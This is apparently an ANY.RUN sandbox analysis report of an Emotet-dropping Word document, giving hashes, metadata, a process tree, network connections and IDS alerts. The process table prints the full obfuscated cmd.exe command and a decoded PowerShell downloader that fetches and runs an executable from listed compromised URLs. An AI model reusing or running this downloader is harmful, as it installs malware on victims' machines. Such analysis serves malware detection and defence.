download: | oDbjZ-lSw49e14mz9Pq1R_EBWkaWgoR-CL |
Full analysis: | https://app.any.run/tasks/d2003361-d7ca-47ef-ab24-5b8383308258 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 18, 2018, 14:56:34 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 13:51:00 2018, Last Saved Time/Date: Tue Dec 18 13:51:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 34, Security: 0 |
MD5: | 8173A5C555EFB22C5422FEC88E611299 |
SHA1: | 5F9A92095357539A2A9E944FEB0EC93D3AE6A234 |
SHA256: | C5F26AE65F249BBA96DD1CFB45CBC6BEF35C1908AAEB453244076046A4BC9DEA |
SSDEEP: | 3072:20nbUhcOODsQVa8GhDS0o9zTGOZD6EbzCdvInu:VUoUOZDlbevIn |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:18 13:51:00 |
ModifyDate: | 2018:12:18 13:51:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 34 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 38 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2696 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\oDbjZ-lSw49e14mz9Pq1R_EBWkaWgoR-CL.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4060 | c:\XMPhrwl\vwVpzOjCNHNnBB\cqYSUCvlc\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set pJ9=;'iLw'=BMt$}}{hctac}};kaerb;'Ldz'=oZV$;TRb$ metI-ekovnI{ )00008 eg- htgnel.)TRb$ metI-teG(( fI;'WQN'=Htc$;)TRb$ ,cFN$(eliFdaolnwoD.pqr${yrt{)EkO$ ni cFN$(hcaerof;'exe.'+HoR$+'\'+pmet:vne$=TRb$;'dDu'=tnm$;'963' = HoR$;'kwk'=PLt$;)'@'(tilpS.'GKHabg_iybyVx3h/li.gro.seulb.www//:ptth@b1Kf6_alLvtg/ed.nesniw-bulcsinnet.www//:ptth@2fp0_62Fgq5/ue.senuajsoedivsel.txen.www//:ptth@Rwaf_KBWz/moc.ahnagebas.www//:ptth@hheaIBwh_kVd/ten.oedivotohpthgilorp.www//:ptth'=EkO$;tneilCbeW.teN tcejbo-wen=pqr$;'TCc'=zDk$ llehsrewop&&for /L %Z in (510,-1,0)do set 1z=!1z!!pJ9:~%Z,1!&&if %Z lss 1 call %1z:*1z!=%" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2564 | CmD /V:O/C"set pJ9=;'iLw'=BMt$}}{hctac}};kaerb;'Ldz'=oZV$;TRb$ metI-ekovnI{ )00008 eg- htgnel.)TRb$ metI-teG(( fI;'WQN'=Htc$;)TRb$ ,cFN$(eliFdaolnwoD.pqr${yrt{)EkO$ ni cFN$(hcaerof;'exe.'+HoR$+'\'+pmet:vne$=TRb$;'dDu'=tnm$;'963' = HoR$;'kwk'=PLt$;)'@'(tilpS.'GKHabg_iybyVx3h/li.gro.seulb.www//:ptth@b1Kf6_alLvtg/ed.nesniw-bulcsinnet.www//:ptth@2fp0_62Fgq5/ue.senuajsoedivsel.txen.www//:ptth@Rwaf_KBWz/moc.ahnagebas.www//:ptth@hheaIBwh_kVd/ten.oedivotohpthgilorp.www//:ptth'=EkO$;tneilCbeW.teN tcejbo-wen=pqr$;'TCc'=zDk$ llehsrewop&&for /L %Z in (510,-1,0)do set 1z=!1z!!pJ9:~%Z,1!&&if %Z lss 1 call %1z:*1z!=%" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2492 | powershell $kDz='cCT';$rqp=new-object Net.WebClient;$OkE='http://www.prolightphotovideo.net/dVk_hwBIaehh@http://www.sabeganha.com/zWBK_fawR@http://www.next.lesvideosjaunes.eu/5qgF26_0pf2@http://www.tennisclub-winsen.de/gtvLla_6fK1b@http://www.blues.org.il/h3xVybyi_gbaHKG'.Split('@');$tLP='kwk';$RoH = '369';$mnt='uDd';$bRT=$env:temp+'\'+$RoH+'.exe';foreach($NFc in $OkE){try{$rqp.DownloadFile($NFc, $bRT);$ctH='NQW';If ((Get-Item $bRT).length -ge 80000) {Invoke-Item $bRT;$VZo='zdL';break;}}catch{}}$tMB='wLi'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3512 | "C:\Users\admin\AppData\Local\Temp\369.exe" | C:\Users\admin\AppData\Local\Temp\369.exe | — | powershell.exe |
User: admin Company: LEAD Technologies, Inc. Integrity Level: MEDIUM Description: LEADTOOLS® DLL for Win32 Exit code: 0 Version: 8.00.0.010 | ||||
2668 | "C:\Users\admin\AppData\Local\Temp\369.exe" | C:\Users\admin\AppData\Local\Temp\369.exe | 369.exe | |
User: admin Company: LEAD Technologies, Inc. Integrity Level: MEDIUM Description: LEADTOOLS® DLL for Win32 Exit code: 0 Version: 8.00.0.010 | ||||
2104 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 369.exe |
User: admin Company: LEAD Technologies, Inc. Integrity Level: MEDIUM Description: LEADTOOLS® DLL for Win32 Exit code: 0 Version: 8.00.0.010 | ||||
2912 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: LEAD Technologies, Inc. Integrity Level: MEDIUM Description: LEADTOOLS® DLL for Win32 Version: 8.00.0.010 |
PID | Process | Filename | Type | |
---|---|---|---|---|
2696 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR8AA2.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2696 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\7B71E1B3.wmf | — | |
MD5:— | SHA256:— | |||
2696 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DF8BB939.wmf | — | |
MD5:— | SHA256:— | |||
2492 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2EJWC0BO8CMKWB51V9UN.temp | — | |
MD5:— | SHA256:— | |||
2696 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AF30C818.wmf | wmf | |
MD5:27C92DAB164A450C53A74852371C2B4C | SHA256:5D47EE6B9D9C8D1AEE49700B7C0579700ADC1F4A740BE59E970B22D5C3CC8D0C | |||
2696 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3BF7DDFA.wmf | wmf | |
MD5:243984514B7D339530FD9FFF2902D22E | SHA256:09F9B8746F0563E626E9CC8B03AB333EB085A65A1057ACD6414960CDFAB2257B | |||
2668 | 369.exe | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | executable | |
MD5:059023098F79F8401498C6015991F77A | SHA256:AE797BE3820A34281F860E9F8AE85743DD62F3DED25BB5DFF1681153EA1F535F | |||
2492 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:901ECDF767744E6BB59CB023757886E3 | SHA256:48A990A7B1201BFD70F417698302A6299D036A6574E558A96000AF48469479E1 | |||
2696 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:82B9FF266C32B59B1FC2A0C40B975FBD | SHA256:5B4F3EFCCDF4F09343E6C01FABC4E51BD7D8CE4EDC5D7F72D6626890903C04AC | |||
2696 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:8868A8782AD5472EC8A9202F695E3D99 | SHA256:0EC8DB2B9388819C32F774138F13ABF70543845E8AA437ED0914A99A62D3E2A4 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2912 | archivesymbol.exe | GET | — | 217.173.64.242:443 | http://217.173.64.242:443/ | RU | — | — | suspicious |
2912 | archivesymbol.exe | GET | — | 61.1.33.229:80 | http://61.1.33.229/ | IN | — | — | malicious |
2912 | archivesymbol.exe | GET | — | 181.48.61.138:20 | http://181.48.61.138:20/ | CO | — | — | malicious |
2492 | powershell.exe | GET | 200 | 93.90.146.108:80 | http://www.prolightphotovideo.net/dVk_hwBIaehh/ | SE | executable | 124 Kb | suspicious |
2912 | archivesymbol.exe | GET | 200 | 138.37.47.17:22 | http://138.37.47.17:22/ | GB | binary | 132 b | malicious |
2492 | powershell.exe | GET | 301 | 93.90.146.108:80 | http://www.prolightphotovideo.net/dVk_hwBIaehh | SE | html | 255 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2492 | powershell.exe | 93.90.146.108:80 | www.prolightphotovideo.net | Levonline AB | SE | suspicious |
2912 | archivesymbol.exe | 217.173.64.242:443 | — | OOO WestCall Ltd. | RU | suspicious |
2912 | archivesymbol.exe | 181.48.61.138:20 | — | Telmex Colombia S.A. | CO | malicious |
2912 | archivesymbol.exe | 61.1.33.229:80 | — | National Internet Backbone | IN | malicious |
2912 | archivesymbol.exe | 138.37.47.17:22 | — | Queen Mary and Westfield College, University of London | GB | malicious |
Domain | IP | Reputation |
---|---|---|
www.prolightphotovideo.net |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
2492 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
2492 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
2492 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2912 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2912 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2912 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2912 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2912 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2912 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2912 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |